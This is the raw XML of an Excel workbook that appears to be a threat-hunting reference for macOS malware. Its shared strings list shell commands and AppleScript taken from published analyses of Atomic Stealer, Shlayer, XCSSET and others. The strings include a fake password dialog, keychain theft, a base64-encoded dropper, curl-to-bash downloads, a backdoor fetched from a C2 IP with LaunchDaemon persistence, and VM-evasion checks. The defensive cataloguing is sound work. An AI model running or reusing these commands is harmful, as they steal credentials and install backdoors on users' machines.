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202300"/>
  <mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006">
    <mc:Choice Requires="x15">
      <x15ac:absPath xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac" url="/Users/harveywargo/Desktop/"/>
    </mc:Choice>
  </mc:AlternateContent>
  <xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{90CFB5A0-489F-A645-824A-3AC791EE2EEB}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="0" yWindow="760" windowWidth="34560" windowHeight="21580" activeTab="1" xr2:uid="{503C4303-42A1-DB4B-BD90-2FBAE899660F}"/>
  </bookViews>
  <sheets>
    <sheet name="shell_history" sheetId="14" r:id="rId1"/>
    <sheet name="process_create" sheetId="1" r:id="rId2"/>
    <sheet name="process_access" sheetId="6" r:id="rId3"/>
    <sheet name="file_event" sheetId="7" r:id="rId4"/>
    <sheet name="winevt_4624" sheetId="8" r:id="rId5"/>
    <sheet name="winevt_7045" sheetId="9" r:id="rId6"/>
    <sheet name="mde" sheetId="13" r:id="rId7"/>
    <sheet name="generic" sheetId="5" r:id="rId8"/>
    <sheet name="pc_pivot" sheetId="3" r:id="rId9"/>
    <sheet name="pa_pivot" sheetId="10" r:id="rId10"/>
    <sheet name="file_pivot" sheetId="11" r:id="rId11"/>
    <sheet name="gen_pivot" sheetId="12" r:id="rId12"/>
  </sheets>
  <calcPr calcId="191029"/>
  <pivotCaches>
    <pivotCache cacheId="37" r:id="rId13"/>
    <pivotCache cacheId="38" r:id="rId14"/>
    <pivotCache cacheId="39" r:id="rId15"/>
    <pivotCache cacheId="40"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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="457" uniqueCount="225">
  <si>
    <t>delta_pid</t>
  </si>
  <si>
    <t>process_cmdline</t>
  </si>
  <si>
    <t>initiating_process_cmdline</t>
  </si>
  <si>
    <t>process_name</t>
  </si>
  <si>
    <t>initiating_process_name</t>
  </si>
  <si>
    <t>data_object</t>
  </si>
  <si>
    <t>delta_eid</t>
  </si>
  <si>
    <t>ns_meta</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>Row Labels</t>
  </si>
  <si>
    <t>Grand Total</t>
  </si>
  <si>
    <t>Count of delta_eid</t>
  </si>
  <si>
    <t>Count of delta_pid</t>
  </si>
  <si>
    <t>htool</t>
  </si>
  <si>
    <t>hscript</t>
  </si>
  <si>
    <t>file_action</t>
  </si>
  <si>
    <t>process_path</t>
  </si>
  <si>
    <t>initiating_process_path</t>
  </si>
  <si>
    <t>file_path</t>
  </si>
  <si>
    <t>file_name</t>
  </si>
  <si>
    <t>c2</t>
  </si>
  <si>
    <t>evidence</t>
  </si>
  <si>
    <t>sub_sid</t>
  </si>
  <si>
    <t>logon_type</t>
  </si>
  <si>
    <t>logon_process_name</t>
  </si>
  <si>
    <t>src_process</t>
  </si>
  <si>
    <t>src_process_path</t>
  </si>
  <si>
    <t>tgt_process</t>
  </si>
  <si>
    <t>tgt_process_path</t>
  </si>
  <si>
    <t>access</t>
  </si>
  <si>
    <t>trace</t>
  </si>
  <si>
    <t>object</t>
  </si>
  <si>
    <t>sub_account</t>
  </si>
  <si>
    <t>type</t>
  </si>
  <si>
    <t>initiating_file_name</t>
  </si>
  <si>
    <t>service_name</t>
  </si>
  <si>
    <t>start_type</t>
  </si>
  <si>
    <t>service_file_name</t>
  </si>
  <si>
    <t>initiating_process_name_parent</t>
  </si>
  <si>
    <t>service_account</t>
  </si>
  <si>
    <t>initiating_file_path</t>
  </si>
  <si>
    <t>(blank)</t>
  </si>
  <si>
    <t>process_account</t>
  </si>
  <si>
    <t>group</t>
  </si>
  <si>
    <t>shell_cmdline</t>
  </si>
  <si>
    <t>{"date": "2025-04", "url": "https://www.picussecurity.com/resource/blog/atomic-stealer-amos-macos-threat-analysis"}</t>
  </si>
  <si>
    <t>osascript -e 'display dialog "The launcher needs permissions to enable background auto-updates.\n\nPlease enter your password." with title "Auto-Updates System" default answer "" with icon caution buttons {"Continue"} default button "Continue" with hidden answer'</t>
  </si>
  <si>
    <t>Atomic Stealer employs AppleScript commands executed via osascript to create these fake dialog boxes.</t>
  </si>
  <si>
    <t>cp ~/Library/Keychains ~/Documents/data/Keychain/kc.db</t>
  </si>
  <si>
    <t>security unlock-keychain -p &lt;password&gt; /Users/&lt;user&gt;/Library/Keychains/login.keychain-db</t>
  </si>
  <si>
    <t>Atomic Stealer copies the Keychain database to a new directory</t>
  </si>
  <si>
    <t>unlocks the keychain and uses the bundled open-source tool Chainbreaker to extract credentials. This allows exfiltration of login data stored in the keychain.</t>
  </si>
  <si>
    <t>duplicate file "Cookies.binarycookies" of folder safariFolder to folder baseFolderPath with replacing</t>
  </si>
  <si>
    <t>duplicate file "NoteStore.sqlite"</t>
  </si>
  <si>
    <t>duplicate file "NoteStore.sqlite-shm"</t>
  </si>
  <si>
    <t>duplicate file "NoteStore.sqlite-wal"</t>
  </si>
  <si>
    <t>repeat with aFile in (desktopFiles &amp; documentsFiles)
  if fileExtension is in extensionsList and fileSize ≤ 51200 then
    duplicate aFile to folder fileGrabberFolderPath with replacing
  end if
end repeat</t>
  </si>
  <si>
    <t>/bin/bash -c "$(curl -fsSL https://jobstreet-storage.com/install.sh)"</t>
  </si>
  <si>
    <t xml:space="preserve">#!/bin/bash 
wDwyQrpH='IyEvYmluL2Jhc2gKb3Nhc2NyaXB0IC1lICdvbiBydW4KICAgIHRyeQogICAgICAgIHNldCB2b2x1bWVMaXN0IHRvIGxpc3QgZGlza3MKICAgIGVuZCB0cnkKICAgIHNldCBzZXR1cFZvbHVtZSB0byAiIgogICAgdHJ5CiAgICAgIC' 
IxOudLSd='AgcmVwZWF0IHdpdGggdm9sIGluIHZvbHVtZUxpc3QKICAgICAgICAgICAgaWYgdm9sIGNvbnRhaW5zICJEZWVwU2VlayIgdGhlbgogICAgICAgICAgICAgICAgc2V0IHNldHVwVm9sdW1lIHRvIHZvbAogICAgICAgICAgICAgICAgZXhpdCByZXBlYXQKICAgICAgICAgICAgZW5kIGlmCiAgICAgICAgZW5kIHJlcGVhdAogICAgZW5kIHRyeQogIC' 
SkkdUOuJ='AgaWYgc2V0dXBWb2x1bWUgaXMgIiIgdGhlbgogICAgICAgIHJldHVybgogICAgZW5kIGlmCiAgICBzZXQgc2NyaXB0RGlyIHRvICIvVm9sdW1lcy8iICYgc2V0dXBWb2x1bWUgJiAiLyIKICAgIHNldCBleGVjdXRhYmxlTmFtZSB0byAiLkRlZXBTZWVrIgogICAgc2V0IGV4ZWN1dGFibGVQYXRoIHRvIHNjcmlwdERpciAmIGV4ZWN1dGFibGVOYW1lCiAgICBzZXQgdG1wRXhlY3V0YWJsZVBhdGggdG8gIi90bXAvIiAmIGV4ZWN1dGFibGVOYW1lCiAgICB0cnkKICAgICAgICBkbyBzaGVsbCBzY3JpcHQgInJtIC1mICIgJiBxdW90ZWQgZm9ybSBvZiB0bXBFeGVjdXRhYmxlUGF0aAogICAgZW5kIHRyeQogICAgdHJ5CiAgICAgICAgZG8gc2hlbGwgc2NyaXB0ICJjcCAiICYgcXVvdGVkIGZvcm0gb2YgZXhlY3V0YWJsZVBhdGggJiAiICIgJiBxdW90ZWQgZm9ybSBvZiB0bXBFeGVjdXRhYmxlUGF0aAogICAgZW5kIHRyeQogICAgdHJ5CiAgICAgICAgZG8gc2hlbGwgc2NyaXB0ICJ4YXR0ciAtYyAiICYgcXVvdGVkIGZvcm0gb2YgdG1wRXhlY3V0YWJsZVBhdGgKICAgIGVuZCB0cnkKICAgIHRyeQogICAgICAgIGRvIHNoZWxsIHNjcmlwdCAiY2htb2QgK3ggIiAmIHF1b3RlZCBmb3JtIG9mIHRtcEV4ZWN1dGFibGVQYXRoCiAgICBlbmQgdHJ5CiAgICB0cnkKICAgICAgICBkbyBzaGVsbCBzY3JpcHQgcXVvdGVkIGZvcm0gb2YgdG1wRXhlY3V0YWJsZVBhdGgKICAgIGVuZCB0cnkKZW5kIHJ1bic=' 
funcname="${wDwyQrpH}${IxOudLSd}${SkkdUOuJ}" 
bash -c "$(echo "$funcname" | base64 --decode)" </t>
  </si>
  <si>
    <t>{"date": "2025-02", "url": "https://www.esentire.com/blog/fake-deepseek-site-infects-mac-users-with-atomic-stealer"}</t>
  </si>
  <si>
    <t>osascript -e 'if (short user name of (system info)) is "maria" or (short user name of (system info)) is "run" or (short user name of (system info)) is "jackiemac" or (short user name of (system info)) is "bruno" then error number -1'</t>
  </si>
  <si>
    <t>disown; pkill Terminal</t>
  </si>
  <si>
    <t xml:space="preserve">#!/bin/bash 
osascript -e 'on run 
    try 
        set volumeList to list disks 
    end try 
    set setupVolume to "" 
    try 
        repeat with vol in volumeList 
            if vol contains "DeepSeek" then 
                set setupVolume to vol 
                exit repeat 
            end if 
        end repeat 
    end try 
    if setupVolume is "" then 
        return 
    end if 
    set scriptDir to "/Volumes/" &amp; setupVolume &amp; "/" 
    set executableName to ".DeepSeek" 
    set executablePath to scriptDir &amp; executableName 
    set tmpExecutablePath to "/tmp/" &amp; executableName 
    try 
        do shell script "rm -f " &amp; quoted form of tmpExecutablePath 
    end try 
    try 
        do shell script "cp " &amp; quoted form of executablePath &amp; " " &amp; quoted form of tmpExecutablePath 
    end try 
    try 
        do shell script "xattr -c " &amp; quoted form of tmpExecutablePath 
    end try 
    try 
        do shell script "chmod +x " &amp; quoted form of tmpExecutablePath 
    end try 
    try 
        do shell script quoted form of tmpExecutablePath 
    end try 
end run' 
        </t>
  </si>
  <si>
    <t>{"date": "2021-02", "url": "https://www.sentinelone.com/labs/20-common-tools-techniques-used-by-macos-threat-actors-malware/"}</t>
  </si>
  <si>
    <t>chmod +x</t>
  </si>
  <si>
    <t>chmod -R 755</t>
  </si>
  <si>
    <t>chmod -R 755 /var/folders/vq/04qz73bd7zb27d3b6r7rc6zr0000gq/T/x.mykHCy73</t>
  </si>
  <si>
    <t>chmod +x "xcassets"</t>
  </si>
  <si>
    <t>chmod 777 /tmp/ZQEifWNV2l</t>
  </si>
  <si>
    <t>/bin/chmod +x “${tmpFile}”</t>
  </si>
  <si>
    <t>chown -R &lt;user[:group]&gt;</t>
  </si>
  <si>
    <t>chown root /tmp/script.sh</t>
  </si>
  <si>
    <t>/usr/sbin/chown -R root:wheel /Applications/MyCouponsmart</t>
  </si>
  <si>
    <t>/usr/sbin/chown -R root:wheel /Users/user/Applications/SecureMacUpdates</t>
  </si>
  <si>
    <t>crontab -l</t>
  </si>
  <si>
    <t>echo '&lt;*/num&gt; * * * * ' | crontab -</t>
  </si>
  <si>
    <t>cmd = 'crontab -l | { cat; echo "0 * * * * %s"; } | crontab -'</t>
  </si>
  <si>
    <t>sudo crontab -l 2&gt;/dev/null; echo "*/2 * * * * s</t>
  </si>
  <si>
    <t>cat /etc/passwd | cut -d ":" -f 1 | xargs -n1 crontab -l -u</t>
  </si>
  <si>
    <t>crontab -l &gt; /tmp/file</t>
  </si>
  <si>
    <t>if systemVersion.startswith("10.11") or systemVersion.startswith("10.12"):
    csrutil = subprocess.Popen(["csrutil status"], stdout=subprocess.PIPE, shell=True)
    (out, err) = csrutil.communicate()
	if "disabled" in out:
		send_msg(greenPlus + out, False)
		sipEnabled = False #SIP function exists, but is specifically and intentionally disabled! (enterprise environments likely have this config)</t>
  </si>
  <si>
    <t>/usr/bin/csrutil</t>
  </si>
  <si>
    <t>csrutil status</t>
  </si>
  <si>
    <t>curl -k -s -L -o</t>
  </si>
  <si>
    <t>req=`curl -ks "http://owpqkszz.info/link.php?${whoami}&amp;${ip}"`</t>
  </si>
  <si>
    <t>curl -fsL "$url" &gt;$tmp_path</t>
  </si>
  <si>
    <t>curl -s -L -o "${dir}/stmp.tar.gz" "${dlUrl}"</t>
  </si>
  <si>
    <t>do curl -L -f -v --create-dirs -o '/Users/user/Library/Application Support/Cyclonica/Cyclonica'</t>
  </si>
  <si>
    <t>curl --connect-timeout 10 -sk https://flixprice.com/agent/log.php</t>
  </si>
  <si>
    <t>dirname /Users/user/Library/LaunchAgents/com.apple.core.accountsd.plist</t>
  </si>
  <si>
    <t>sh -c basename '/Users/user/Library/Application Scripts/com.apple.AddressBook.Shared/CoreFrameworks/com.oracle.java.sound.app'</t>
  </si>
  <si>
    <t>osascript -e 'tell app "iTunes" to activate' -e 'tell app "iTunes" to display dialog "Error connecting to iTunes. Please verify your password”</t>
  </si>
  <si>
    <t>osascript -e</t>
  </si>
  <si>
    <t>cmd = 'osascript -e 'tell app "Finder" to display dialog "%s"'' % args.text</t>
  </si>
  <si>
    <t>cmd_data["args"] = " -e 'tell application "Finder" to sleep'"</t>
  </si>
  <si>
    <t>/usr/bin/osascript</t>
  </si>
  <si>
    <t>osacompile -x -e global dFolder</t>
  </si>
  <si>
    <t>osacompile -x -o /Users/user/Library/Application Scripts/com.apple.AddressBook.Shared/CoreFrameworks/com.apple.core.okcx.app</t>
  </si>
  <si>
    <t>osacompile -x -e</t>
  </si>
  <si>
    <t>osacompile -x -o</t>
  </si>
  <si>
    <t>eval "$(openssl enc -base64 -d -aes-256-cbc -nosalt -pass pass:10598344576 &lt;"$fileDir"/Resources/talon)"</t>
  </si>
  <si>
    <t>openssl enc -aes-256-cbc -salt -md md5 -d -A -base64 -out /tmp/ZQEifWNV2l -pass "pass:0.6effariGgninthgiL0.6"</t>
  </si>
  <si>
    <t>/bin/sh -c /usr/sbin/ioreg -c IOPlatformExpertDevice -d 2 | awk -F" '/IOPlatformSerialNumber/{print $(NF-1)}' | tr -d 'n'| openssl md5</t>
  </si>
  <si>
    <t>os.popen("openssl req -newkey rsa:4096 -nodes -x509 -days 365 -subj "%s" -sha256 "</t>
  </si>
  <si>
    <t>openssl enc -aes-256-cbc -d -A -base64 -k</t>
  </si>
  <si>
    <t>mktemp -d</t>
  </si>
  <si>
    <t>mktemp -t</t>
  </si>
  <si>
    <t>TMP_DIR=`mktemp -d -t x</t>
  </si>
  <si>
    <t>tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)</t>
  </si>
  <si>
    <t>/bin/launchctl unload</t>
  </si>
  <si>
    <t>launchctl load -w</t>
  </si>
  <si>
    <t>/bin/launchctl load</t>
  </si>
  <si>
    <t>launchctl load -w "%s/Library/LaunchAgents/%s"</t>
  </si>
  <si>
    <t>launchctl load /Library/LaunchDaemons/com.apple.acc.installer.v1.plist</t>
  </si>
  <si>
    <t>launchctl load</t>
  </si>
  <si>
    <t>launchctl unload</t>
  </si>
  <si>
    <t>launchctl stop</t>
  </si>
  <si>
    <t>launchctl start</t>
  </si>
  <si>
    <t>launchctl remove</t>
  </si>
  <si>
    <t>pkill cfprefsd</t>
  </si>
  <si>
    <t>xargs kill -9</t>
  </si>
  <si>
    <t>killall Terminal</t>
  </si>
  <si>
    <t>pkill</t>
  </si>
  <si>
    <t>kill -9</t>
  </si>
  <si>
    <t>killall</t>
  </si>
  <si>
    <t>ps ax</t>
  </si>
  <si>
    <t>ps -p -o etime=</t>
  </si>
  <si>
    <t>ps ax | grep -E '360|Keeper|MacMgr|Lemon|Malware|Avast|Avira|CleanMyMac' | grep -v grep | awk '{print $1}'</t>
  </si>
  <si>
    <t>ps -eAo pid,thcount,ppid,nice,user,command 2&gt;/dev/null</t>
  </si>
  <si>
    <t>if ps -ef | grep -v grep | grep -q $frm; then</t>
  </si>
  <si>
    <t>check_output('ps -p %s -o etime=' % bellaPID)</t>
  </si>
  <si>
    <t>sw_vers</t>
  </si>
  <si>
    <t>sw_vers -productName</t>
  </si>
  <si>
    <t>sw_vers -productVersion</t>
  </si>
  <si>
    <t>sw_vers -buildVersion</t>
  </si>
  <si>
    <t>/usr/bin/sw_vers -productVersion</t>
  </si>
  <si>
    <t>osinfo = os.popen('sw_vers -productName').read().strip() + '-' + os.popen('sw_vers -productVersion').read().strip() + '-' + os.popen('sw_vers -buildVersion').read().strip() + ',' + platform.platform()</t>
  </si>
  <si>
    <t>sysctl -n hw.model</t>
  </si>
  <si>
    <t>sysctl -n machdep.cpu.brand_string; hostinfo | grep memory;</t>
  </si>
  <si>
    <t>model_key = run_command("sysctl -n hw.model")</t>
  </si>
  <si>
    <t>/usr/sbin/sysctl
hw.optional.x86_64
hw.cpu64bit_capable</t>
  </si>
  <si>
    <t>sysctl hw.model</t>
  </si>
  <si>
    <t>system_profiler SPHardwareDataType</t>
  </si>
  <si>
    <t>system_profiler SPUSBDataType</t>
  </si>
  <si>
    <t>system_profiler SPNetworkDataType</t>
  </si>
  <si>
    <t>/usr/sbin/system_profiler -nospawn -xml SPHardwareDataType -detailLevel full</t>
  </si>
  <si>
    <t>process = subprocess.Popen("system_profiler SPHardwareDataType", stdout=subprocess.PIPE, shell=True)</t>
  </si>
  <si>
    <t>system_profiler SPUSBDataType | egrep -i "Manufacturer: (parallels|vmware|virtualbox)"</t>
  </si>
  <si>
    <t>system_profiler SPNetworkDataType | grep ‘Proxy Enabled’</t>
  </si>
  <si>
    <t>/usr/sbin/system_profiler SPHardwareDataType</t>
  </si>
  <si>
    <t>touch -t 1401140507 /Users/user/Library/User Photos/mount_devfs</t>
  </si>
  <si>
    <t>Pirrit</t>
  </si>
  <si>
    <t>touch /Applications/.UpdatesMac15</t>
  </si>
  <si>
    <t>touch -t</t>
  </si>
  <si>
    <t>touch</t>
  </si>
  <si>
    <t>Bundlore</t>
  </si>
  <si>
    <t>XCSSET</t>
  </si>
  <si>
    <t>Shlayer</t>
  </si>
  <si>
    <t>SearchMine.Adware</t>
  </si>
  <si>
    <t>OSX.Dummy</t>
  </si>
  <si>
    <t>MMInstall</t>
  </si>
  <si>
    <t>Empyre</t>
  </si>
  <si>
    <t>GravityRAT</t>
  </si>
  <si>
    <t>Pupy RAT</t>
  </si>
  <si>
    <t>VindInstaller</t>
  </si>
  <si>
    <t>Bella</t>
  </si>
  <si>
    <t>MacSearch</t>
  </si>
  <si>
    <t>OSX.Proton.C</t>
  </si>
  <si>
    <t>OSX.GMERA</t>
  </si>
  <si>
    <t>Schlayer</t>
  </si>
  <si>
    <t>OSX.Mami</t>
  </si>
  <si>
    <t>OceanLotus</t>
  </si>
  <si>
    <t>dirname /Applications/MyCouponsmart/MyCouponsmart</t>
  </si>
  <si>
    <t>appDir="$(dirname $(dirname "$currentDir"))"</t>
  </si>
  <si>
    <t>ioreg -c IOPlatformExpertDevice -d 2 | awk -F'"' '/IOPlatformSerialNumber/{print $(NF-1)}'</t>
  </si>
  <si>
    <t>ioreg -rd1 -w0 -c AppleAHCIDiskDriver | awk '/Serial Number/{gsub(""", "", $4);print $4}'</t>
  </si>
  <si>
    <t>ioreg -l | grep -e 'VirtualBox' -e 'Oracle' -e 'VMware' -e 'Parallels' | wc -l</t>
  </si>
  <si>
    <t>OSX.Fruitfly</t>
  </si>
  <si>
    <t>ioreg -rd1 -c IOPlatformExpertDevice | awk '/IOPlatformSerialNumber/ { split($0, line, "\""); printf("%s", line[4]); }'</t>
  </si>
  <si>
    <t>macOS.OSAMiner</t>
  </si>
  <si>
    <t>OSX.CoinMiner</t>
  </si>
  <si>
    <t>Lazarus</t>
  </si>
  <si>
    <t>export tmpDir="$(mktemp -d /tmp/XXXXXXXXXXXX)"</t>
  </si>
  <si>
    <t>EvilOSX</t>
  </si>
  <si>
    <t>dirname &lt;path&gt;</t>
  </si>
  <si>
    <t>basename &lt;path&gt;</t>
  </si>
  <si>
    <t>dirname /Users/user/Downloads/ALL tim nha Chi Ngoc Canada.︀doc</t>
  </si>
  <si>
    <t>Cookies.binarycookies
NoteStore.sqlite &amp; friends
Wallets (e.g., Exodus/passphrase.json)
Keychain file
Sysinfo.txt
Password prompt log</t>
  </si>
  <si>
    <t xml:space="preserve">AMOS Stealer Exfil </t>
  </si>
  <si>
    <t>OSX.CPuMeaner</t>
  </si>
  <si>
    <t>OSX.Fruittly</t>
  </si>
  <si>
    <t>Lazarus Family</t>
  </si>
  <si>
    <t>FinFisher/FinSpy</t>
  </si>
  <si>
    <t>Zschlayer</t>
  </si>
  <si>
    <t>EggShell</t>
  </si>
  <si>
    <t>Elite Keylogger</t>
  </si>
  <si>
    <t>GravityRaAT</t>
  </si>
  <si>
    <t>Lazarus/NukeSped</t>
  </si>
  <si>
    <t>Genieo</t>
  </si>
  <si>
    <t>SearchPageInstaller</t>
  </si>
  <si>
    <t>AMC.PUA, Genieo</t>
  </si>
  <si>
    <t>whoami</t>
  </si>
  <si>
    <t>echo '%@' | sudo -S whoami</t>
  </si>
  <si>
    <t>username=`whoami`</t>
  </si>
  <si>
    <t>whoami="$(remove_spec_char `whoami`)"</t>
  </si>
  <si>
    <t>xattr -d com.apple.quarantine</t>
  </si>
  <si>
    <t>xattr -c</t>
  </si>
  <si>
    <t>xattr -cr</t>
  </si>
  <si>
    <t xml:space="preserve">find /Users/user -name *ALL tim nha Chi Ngoc Canada* -exec xattr -d com.apple.quarantine {} + </t>
  </si>
  <si>
    <t>/bin/bash -c xattr -cr '/Applications/Google Chrome.app'</t>
  </si>
  <si>
    <t>$ dscl . list /Users UniqueID</t>
  </si>
  <si>
    <t>$ dscl . list /Users UniqueID | grep -v ^_</t>
  </si>
  <si>
    <t>{"date": "2025-07", "url": "https://moonlock.com/amos-backdoor-persistent-access"}</t>
  </si>
  <si>
    <t>set profile to "/Users/" &amp; username
...
set login to "N9VXZ4KPS1ImRJ31CbZSLRQanDQPN2GxluHyoP-CbG8="
set buildid to "jr-Unnhj4mit33GBfUUNqv8Ug4fLZdQpDO70LqFV2hc="
set gate to "http://45.94.47.147" &lt;--- (also used 45.94.47.145)
set cl to "0"
set cn to "EHohNQyGKy-KKS5af2oAsbV-8GLICPFeOxzjlbfxoPw="
set botUrl to "isnimitz.com"
send_data(0, gate, login, buildid, cl, cn)    &lt;-- (send stolen data)
try
	do shell script "rm -f " &amp; profile &amp; "/.username"
end try
...
replaceApp(profile, password_entered, botUrl) &lt;-- (Fake Ledger Live)
installBot(profile, password_entered, botUrl) &lt;-- (Backdoor)
...</t>
  </si>
  <si>
    <t>set botPath to (quoted form of (profile &amp; "/.helper"))
do shell script "curl -o " &amp; botPath &amp; " https://" &amp; botUrl &amp; "/zxc/app"
do shell script "chmod +x " &amp; botPath</t>
  </si>
  <si>
    <t>set scriptContent to "while true; do\n    osascript &lt;&lt;EOF\n    set loginContent to do shell script \"stat -f \\\"%Su\\\" /dev/console\"\nif loginContent is not equal to \"\" and loginContent is not equal to \"root\"\n    do shell script \"sudo -u \" &amp; quoted form of loginContent &amp; \" " &amp; (quoted form of (profile &amp; "/.helper")) &amp; "\n    end if\nEOF\n    sleep 1\ndone"
writeText(scriptContent, profile &amp; "/.agent")
do shell script "chmod +x " &amp; quoted form of (profile &amp; "/.agent")</t>
  </si>
  <si>
    <t>set listContent to "&lt;?xml version=\"1.0\" encoding=\"UTF-8\"?&gt;
&lt;!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\"&gt;
&lt;plist version=\"1.0\"&gt;
&lt;dict&gt;
    &lt;key&gt;Label&lt;/key&gt;
    &lt;string&gt;com.finder.helper&lt;/string&gt;
    &lt;key&gt;ProgramArguments&lt;/key&gt;
    &lt;array&gt;
        &lt;string&gt;/bin/bash&lt;/string&gt;
        &lt;string&gt;" &amp; profile &amp; "/.agent&lt;/string&gt;
    &lt;/array&gt;
    &lt;key&gt;RunAtLoad&lt;/key&gt;
    &lt;true/&gt;
    &lt;key&gt;KeepAlive&lt;/key&gt;
    &lt;true/&gt;
&lt;/dict&gt;
&lt;/plist&gt;"
writeText(listContent, "/tmp/starter")</t>
  </si>
  <si>
    <t>Plist</t>
  </si>
  <si>
    <t>do shell script "echo " &amp; quoted form of pwd &amp; " | sudo -S cp /tmp/starter /Library/LaunchDaemons/com.finder.helper.plist"
do shell script "echo " &amp; quoted form of pwd &amp; " | sudo -S chown root:wheel /Library/LaunchDaemons/com.finder.helper.plist"
do shell script "echo " &amp; quoted form of pwd &amp; " | sudo -S launchctl load /Library/LaunchDaemons/com.finder.helper.plist"</t>
  </si>
  <si>
    <t>After being placed into a temporary directory, AppleScript escalates privileges using the stolen password to install the .plist into the system daemon directory. It changes file ownership to root:wheel and loads the daemon via launchctl.</t>
  </si>
  <si>
    <t>osascript -e '
set memData to do shell script "system_profiler SPMemoryDataType"
set hardwareData to do shell script "system_profiler SPHardwareDataType"
if memData contains "QEMU" or 
   memData contains "VMware" or 
   memData contains "KVM" or 
   hardwareData contains "Z31FHXYQ0J" or
   hardwareData contains "C07T508TG1J2" or
   hardwareData contains "C02TM2ZBHX87" or
   hardwareData contains "Chip: Unknown" or
   hardwareData contains "Intel Core 2" then
        set exitCode to 100
else
        set exitCode to 0
end if
do shell script "exit " &amp; exitCode
'</t>
  </si>
  <si>
    <t>curl -s -X POST http://45.94.47.147/api/join/ -d 'bIx3CL-PPk4LGFDUcm46sd168/eEHpTIssQ9/f0BD5E='</t>
  </si>
  <si>
    <t>We also spotted usage of “getuid(2)” and “getpwuid(3)” functions, which gain access to the user’s $HOME folder (passwd.pw_dir). If the file $HOME/.id doesn’t exist, a HTTP POST request is sent.</t>
  </si>
  <si>
    <t>curl -s http://45.94.47.147/api/tasks/rj6LeUfFRSCCK0HeLmXO1w==</t>
  </si>
  <si>
    <t>rm -f $HOME/.id
rm -f $HOME/.username
rm -f $HOME/.helper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</si>
</sst>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8"/>
      <name val="Aptos Narrow"/>
      <family val="2"/>
      <scheme val="minor"/>
    </font>
  </fonts>
  <fills count="8">
    <fill>
      <patternFill patternType="none"/>
    </fill>
    <fill>
      <patternFill patternType="gray125"/>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF00B0F0"/>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rgb="FF92D050"/>
        <bgColor indexed="64"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor theme="5" tint="-0.49998474074526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2" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="2" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="3" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="4" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="6" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="0" xfId="0" applyFill="1"/>
    <xf numFmtId="0" fontId="0" fillId="7" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
    <xf numFmtId="0" fontId="0" fillId="5" borderId="0" xfId="0" applyFill="1" applyAlignment="1">
      <alignment wrapText="1"/>
    </xf>
  </cellXfs>
  <cellStyles count="1">
    <cellStyle name="Normal" xfId="0" builtinId="0"/>
  </cellStyles>
  <dxfs count="21">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rgb="FF92D05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rgb="FF00B0F0"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="5" tint="-0.499984740745262"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="5" tint="-0.249977111117893"/>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7" tint="-0.249977111117893"/>
        </patternFill>
      </fill>
    </dxf>
    <dxf>
      <alignment horizontal="general" vertical="bottom" textRotation="0" wrapText="1" indent="0" justifyLastLine="0" shrinkToFit="0" readingOrder="0"/>
    </dxf>
    <dxf>
      <fill>
        <patternFill patternType="solid">
          <fgColor indexed="64"/>
          <bgColor theme="3" tint="0.499984740745262"/>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vey Wargo" refreshedDate="45778.569829166663" createdVersion="8" refreshedVersion="8" minRefreshableVersion="3" recordCount="1" xr:uid="{18FB9807-E196-9540-BE4B-38DD33FA94D8}">
  <cacheSource type="worksheet">
    <worksheetSource name="Table5"/>
  </cacheSource>
  <cacheFields count="8">
    <cacheField name="delta_eid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="delta_pid" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="description" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="htool" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="hscript" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="c2" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="evidence" numFmtId="0">
      <sharedItems containsNonDate="0" containsString="0" containsBlank="1"/>
    </cacheField>
    <cacheField name="ns_meta" numFmtId="0">
      <sharedItems containsNonDate="0" containsBlank="1" count="19">
        <m/>
        <s v="{ &quot;date&quot;: &quot;2024-09&quot;, &quot;url&quot;: &quot;https://thedfirreport.com/2024/09/30/nitrogen-campaign-drops-sliver-and-ends-with-blackcat-ransomware/&quot;, &quot;tags&quot;: [&quot;blackcat&quot;, &quot;alphv&quot;]}" u="1"/>
